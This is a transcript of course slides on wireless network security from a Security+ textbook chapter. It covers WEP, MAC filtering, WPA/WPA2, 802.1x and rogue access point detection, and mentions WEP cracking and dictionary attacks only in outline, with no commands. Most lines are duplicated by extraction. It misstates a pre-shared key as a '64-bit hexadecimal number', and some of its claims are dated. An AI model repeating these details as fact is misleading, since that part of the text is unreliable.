ch06 wireless network security
DESCRIPTION
Security+ Guide to Network Security Fundamentals, 3rd Edition, by Mark CiampaKnowledge and skills required for Network Administrators and Information Technology professionals to be aware of security vulnerabilities, to implement security measures, to analyze an existing network environment in consideration of known security threats or risks, to defend against attacks or viruses, and to ensure data privacy and integrity. Terminology and procedures for implementation and configuration of security, including access control, authorization, encryption, packet filters, firewalls, and Virtual Private Networks (VPNs). CNIT 120: Network Securityhttp://samsclass.info/120/120_S09.shtml#lecturePolicy: http://samsclass.info/policy_use.htmMany thanks to Sam Bowne for allowing to publish these presentations.TRANSCRIPT
Security+ Guide to Security+ Guide to Network Security Network Security
Fundamentals, Third Fundamentals, Third EditionEditionChapter 6Chapter 6
Wireless Network SecurityWireless Network Security
TJX Data BreachTJX Data Breach
TJX used WEP TJX used WEP security security
They lost 45 They lost 45 million million customer customer recordsrecords
They settled the They settled the lawsuits for lawsuits for $40.9 million$40.9 million• Link Ch 6aLink Ch 6a
ObjectivesObjectives
Describe the basic IEEE 802.11 Describe the basic IEEE 802.11 wireless security protectionswireless security protections
Define the vulnerabilities of open Define the vulnerabilities of open system authentication, WEP, and system authentication, WEP, and device authenticationdevice authentication
Describe the WPA and WPA2 personal Describe the WPA and WPA2 personal security modelssecurity models
Explain how enterprises can Explain how enterprises can implement wireless securityimplement wireless security
IEEE 802.11 Wireless IEEE 802.11 Wireless Security ProtectionsSecurity Protections
Institute of Electrical and Institute of Electrical and Electronics Engineers (IEEE)Electronics Engineers (IEEE)
In the early 1980s, the IEEE began In the early 1980s, the IEEE began work on developing computer work on developing computer network architecture standardsnetwork architecture standards• This work was called Project 802This work was called Project 802
In 1990, the IEEE formed a committee In 1990, the IEEE formed a committee to develop a standard for WLANs to develop a standard for WLANs (Wireless Local Area Networks)(Wireless Local Area Networks)• At that time WLANs operated at a speed At that time WLANs operated at a speed
of 1 to 2 million bits per second (Mbps)of 1 to 2 million bits per second (Mbps)
IEEE 802.11 WLAN StandardIEEE 802.11 WLAN Standard
In 1997, the IEEE approved the IEEE In 1997, the IEEE approved the IEEE 802.11 WLAN standard802.11 WLAN standard
RevisionsRevisions• IEEE 802.11aIEEE 802.11a• IEEE 802.11bIEEE 802.11b• IEEE 802.11gIEEE 802.11g• IEEE 802.11nIEEE 802.11n
Controlling Access to a WLANControlling Access to a WLAN
Access is controlled by limiting a Access is controlled by limiting a device’s access to the access point device’s access to the access point (AP)(AP)
Only devices that are authorized can Only devices that are authorized can connect to the APconnect to the AP• One way: Media Access Control (MAC) One way: Media Access Control (MAC)
address filteringaddress filtering• CCSF uses this technique (unfortunately)CCSF uses this technique (unfortunately)• See www.ccsf.edu/wifiSee www.ccsf.edu/wifi
Controlling AccessControlling Access
MAC Address FilteringMAC Address Filtering
MAC Address FilteringMAC Address Filtering
Usually Usually implemented by implemented by permitting permitting instead of instead of preventingpreventing
CCSF does thisCCSF does thiswww.ccsf.edu/wifiwww.ccsf.edu/wifi
Security+ Guide to Network Security Fundamentals, Third Edition
Wired Equivalent Privacy (WEP)Wired Equivalent Privacy (WEP)
Designed to ensure that only Designed to ensure that only authorized parties can view authorized parties can view transmitted wireless informationtransmitted wireless information
Uses encryption to protect trafficUses encryption to protect traffic WEP was designed to be:WEP was designed to be:
• Efficient and reasonably strongEfficient and reasonably strong
11
WEP KeysWEP Keys
WEP secret keys can be 64 or 128 WEP secret keys can be 64 or 128 bits longbits long
The AP and devices can hold up to The AP and devices can hold up to four shared secret keysfour shared secret keys• One of which must be designated as the One of which must be designated as the
default keydefault key
WEP Encryption ProcessWEP Encryption Process
Transmitting with WEPTransmitting with WEP
Device AuthenticationDevice Authentication
Before a computer can connect to a Before a computer can connect to a WLAN, it must be WLAN, it must be authenticatedauthenticated
Types of authentication in 802.11Types of authentication in 802.11• Open system authenticationOpen system authentication
Lets everyone inLets everyone in
• Shared key authenticationShared key authentication Only lets computers in if they know the Only lets computers in if they know the
shared keyshared key
Vulnerabilities of IEEE Vulnerabilities of IEEE 802.11 Security802.11 Security
Open system authenticationOpen system authentication
MAC address filteringMAC address filtering
WEPWEP
Open System AuthenticationOpen System Authentication
To connect, a computer To connect, a computer needs the SSID (network needs the SSID (network name)name)
Routers normally send Routers normally send out out beacon frames beacon frames announcing the SSIDannouncing the SSID
Passive scanningPassive scanning• A wireless device listens A wireless device listens
for a beacon framefor a beacon frame
Turning Off BeaconingTurning Off Beaconing
For "security" some people turn off For "security" some people turn off beaconsbeacons• This annoys your legitimate users, who This annoys your legitimate users, who
must now type in the SSID to connectmust now type in the SSID to connect• It doesn't stop intruders, because the SSID It doesn't stop intruders, because the SSID
is sent out in management frames anywayis sent out in management frames anyway• It can also affect roamingIt can also affect roaming• Windows XP prefers networks that Windows XP prefers networks that
broadcastbroadcast
MAC Address Filtering MAC Address Filtering WeaknessesWeaknesses
MAC addresses are transmitted in the MAC addresses are transmitted in the clearclear• An attacker can just sniff for MACsAn attacker can just sniff for MACs
Managing a large number of MAC Managing a large number of MAC addresses is difficultaddresses is difficult
MAC address filtering does not provide a MAC address filtering does not provide a means to temporarily allow a guest user means to temporarily allow a guest user to access the network to access the network • Other than manually entering the user’s MAC Other than manually entering the user’s MAC
address into the access pointaddress into the access point
WEPWEP To encrypt packets WEP can use only a To encrypt packets WEP can use only a
64-bit or 128-bit number64-bit or 128-bit number• Which is made up of a 24-bit initialization Which is made up of a 24-bit initialization
vector (IV) and a 40-bit or 104-bit default vector (IV) and a 40-bit or 104-bit default keykey
The 24-bit IV is too short, and repeats The 24-bit IV is too short, and repeats before longbefore long
In addition, packets can be replayed to In addition, packets can be replayed to force the access point to pump out IVsforce the access point to pump out IVs
Cracking WEPCracking WEP With the right equipment, WEP can With the right equipment, WEP can
be cracked in just a few minutesbe cracked in just a few minutes• You need a special wireless cardYou need a special wireless card• We do it in CNIT 123: Ethical Hacking We do it in CNIT 123: Ethical Hacking
and Network Defenseand Network Defense
Personal Wireless Personal Wireless SecuritySecurity
• WPA Personal SecurityWPA Personal Security• WPA2 Personal SecurityWPA2 Personal Security
WPA Personal SecurityWPA Personal Security
Wireless Ethernet Compatibility Alliance Wireless Ethernet Compatibility Alliance (WECA)(WECA)• A consortium of wireless equipment A consortium of wireless equipment
manufacturers and software providersmanufacturers and software providers WECA goals:WECA goals:
• To encourage wireless manufacturers to use the To encourage wireless manufacturers to use the IEEE 802.11 technologiesIEEE 802.11 technologies
• To promote and market these technologiesTo promote and market these technologies• To test and certify that wireless products adhere To test and certify that wireless products adhere
to the IEEE 802.11 standards to ensure product to the IEEE 802.11 standards to ensure product interoperabilityinteroperability
WPA Personal SecurityWPA Personal Security
In 2002, the WECA organization changed its In 2002, the WECA organization changed its name to name to Wi-Fi (Wireless Fidelity) AllianceWi-Fi (Wireless Fidelity) Alliance
In October 2003 the Wi-Fi Alliance introduced In October 2003 the Wi-Fi Alliance introduced Wi-Fi Protected Access (WPA)Wi-Fi Protected Access (WPA)• WPA had the design goal to protect both present WPA had the design goal to protect both present
and future wireless devices, addresses both and future wireless devices, addresses both wireless authentication and encryptionwireless authentication and encryption
PSK addresses authentication and TKIP PSK addresses authentication and TKIP addresses encryptionaddresses encryption
WPA Personal SecurityWPA Personal Security
Preshared key (PSK)Preshared key (PSK) authentication authentication• Uses a passphrase to generate the encryption Uses a passphrase to generate the encryption
keykey Key must be entered into both the access Key must be entered into both the access
point and all wireless devicespoint and all wireless devices• Prior to the devices communicating with the APPrior to the devices communicating with the AP
The PSK is not used for encryptionThe PSK is not used for encryption• Instead, it serves as the starting point (seed) Instead, it serves as the starting point (seed)
for mathematically generating the encryption for mathematically generating the encryption keyskeys
Temporal Key Integrity Protocol Temporal Key Integrity Protocol (TKIP)(TKIP)
WPA replaces WEP with TKIPWPA replaces WEP with TKIP TKIP advantages:TKIP advantages:
• TKIP uses a longer 128-bit keyTKIP uses a longer 128-bit key• TKIP uses a new key for each packetTKIP uses a new key for each packet
Message Integrity Check (MIC)Message Integrity Check (MIC) WPA also replaces the (CRC) function WPA also replaces the (CRC) function
in WEP with the in WEP with the Message Integrity Message Integrity Check (MIC)Check (MIC)• Designed to prevent an attacker from Designed to prevent an attacker from
capturing, altering, and resending data capturing, altering, and resending data packetspackets
• See link Ch 6bSee link Ch 6b
WPA2 Personal SecurityWPA2 Personal Security
Wi-Fi Protected Access 2 (WPA2)Wi-Fi Protected Access 2 (WPA2)• Introduced by the Wi-Fi Alliance in Introduced by the Wi-Fi Alliance in
September 2004September 2004• The second generation of WPA securityThe second generation of WPA security• Still uses PSK (Pre-Shared Key) Still uses PSK (Pre-Shared Key)
authenticationauthentication• But instead of TKIP encryption it uses a But instead of TKIP encryption it uses a
stronger data encryption method called stronger data encryption method called AES-CCMPAES-CCMP
WPA2 Personal SecurityWPA2 Personal Security
PSK AuthenticationPSK Authentication• Intended for personal and small office Intended for personal and small office
home office users who do not have home office users who do not have advanced server capabilitiesadvanced server capabilities
• PSK keys are automatically changed and PSK keys are automatically changed and authenticated between devices after a authenticated between devices after a specified period of time known as the specified period of time known as the rekey intervalrekey interval
PSK Key Management PSK Key Management WeaknessesWeaknesses
People may send the key by e-mail or People may send the key by e-mail or another insecure methodanother insecure method
Changing the PSK key is difficultChanging the PSK key is difficult• Must type new key on every wireless Must type new key on every wireless
device and on all access pointsdevice and on all access points• In order to allow a guest user to have In order to allow a guest user to have
access to a PSK WLAN, the key must be access to a PSK WLAN, the key must be given to that guestgiven to that guest
Pre-Shared Key WeaknessPre-Shared Key Weakness
A PSK is a 64-bit hexadecimal A PSK is a 64-bit hexadecimal numbernumber• Usually generated from a passphraseUsually generated from a passphrase
Consisting of letters, digits, punctuation, etc. Consisting of letters, digits, punctuation, etc. that is between 8 and 63 characters in that is between 8 and 63 characters in lengthlength
If the passphrase is a common word, If the passphrase is a common word, it can be found with a it can be found with a dictionary dictionary attackattack
Cracking WPACracking WPA
WPA2 Personal Security WPA2 Personal Security (continued)(continued)
AES-CCMP EncryptionAES-CCMP Encryption• Encryption under the WPA2 personal Encryption under the WPA2 personal
security model is accomplished by security model is accomplished by AES-AES-CCMPCCMP
• This encryption is so complex that it This encryption is so complex that it requires special hardware to be added requires special hardware to be added to the access points to perform itto the access points to perform it
WPA and WPA2 ComparedWPA and WPA2 Compared
Enterprise Wireless Enterprise Wireless SecuritySecurity
Two models:Two models:
IEEE 802.11i IEEE 802.11i
WPA and WPA2 modelsWPA and WPA2 models
IEEE 802.11iIEEE 802.11i
Improves Improves encryptionencryption and and authenticationauthentication
EncryptionEncryption• Replaces WEP’s original PRNG RC4 Replaces WEP’s original PRNG RC4
algorithmalgorithm• With a stronger cipher that performs With a stronger cipher that performs
three steps on every block (128 bits) of three steps on every block (128 bits) of plaintextplaintext
IEEE 802.11iIEEE 802.11i
IEEE 802.11i authentication and key IEEE 802.11i authentication and key management is accomplished by the management is accomplished by the IEEE 802.1x IEEE 802.1x standardstandard
802.1x Authentication802.1x Authentication
IEEE 802.11i (continued)IEEE 802.11i (continued) Key-cachingKey-caching
• Remembers a client, so if a user roams Remembers a client, so if a user roams away from a wireless access point and away from a wireless access point and later returns, she does not need to re-later returns, she does not need to re-enter her credentialsenter her credentials
Pre-authenticationPre-authentication• Allows a device to become authenticated Allows a device to become authenticated
to an AP before moving into range of the to an AP before moving into range of the APAP
• Authentication packet is sent aheadAuthentication packet is sent ahead
WPA Enterprise SecurityWPA Enterprise Security
Designed for medium to large-size Designed for medium to large-size organizationsorganizations
Improved authentication and Improved authentication and encryptionencryption
The authentication used is IEEE The authentication used is IEEE 802.1x and the encryption is TKIP802.1x and the encryption is TKIP
WPA Enterprise Security WPA Enterprise Security (continued)(continued)
IEEE 802.1x AuthenticationIEEE 802.1x Authentication• Provides an authentication framework Provides an authentication framework
for all IEEE 802-based LANsfor all IEEE 802-based LANs• Does not perform any encryptionDoes not perform any encryption
TKIP EncryptionTKIP Encryption• An improvement on WEP encryptionAn improvement on WEP encryption• Designed to fit into the existing WEP Designed to fit into the existing WEP
procedureprocedure
WPA2 Enterprise SecurityWPA2 Enterprise Security
The most secure methodThe most secure method Authentication uses IEEE 802.1xAuthentication uses IEEE 802.1x Encryption is AES-CCMPEncryption is AES-CCMP
Enterprise and Personal Enterprise and Personal Wireless Security ModelsWireless Security Models
Enterprise Wireless Security Enterprise Wireless Security DevicesDevices
Thin Access PointThin Access Point• An access point without the An access point without the
authentication and encryption functionsauthentication and encryption functions These features reside on the These features reside on the wireless switchwireless switch
AdvantagesAdvantages• The APs can be managed from one The APs can be managed from one
central locationcentral location• All authentication is performed in the All authentication is performed in the
wireless switchwireless switch
Enterprise Wireless Security Enterprise Wireless Security Devices (continued)Devices (continued)
Enterprise Wireless Security Enterprise Wireless Security Devices (continued)Devices (continued)
Wireless VLANsWireless VLANs• Can segment traffic and increase Can segment traffic and increase
securitysecurity• The flexibility of a wireless VLAN The flexibility of a wireless VLAN
depends on which device separates the depends on which device separates the packets and directs them to different packets and directs them to different networksnetworks
Enterprise Wireless Security Enterprise Wireless Security Devices (continued)Devices (continued)
For enhanced security, set up two For enhanced security, set up two wireless VLANswireless VLANs• One for employee accessOne for employee access• One for guest accessOne for guest access
Rogue Access Point Discovery Rogue Access Point Discovery ToolsTools
Wireless protocol analyzerWireless protocol analyzer• Auditors carry it around sniffing for rogue Auditors carry it around sniffing for rogue
access pointsaccess points For more security, set up For more security, set up wireless wireless
probes probes to monitor the RF frequencyto monitor the RF frequency
Types of Wireless ProbesTypes of Wireless Probes
Wireless device probeWireless device probe Desktop probeDesktop probe Access point probeAccess point probe Dedicated probeDedicated probe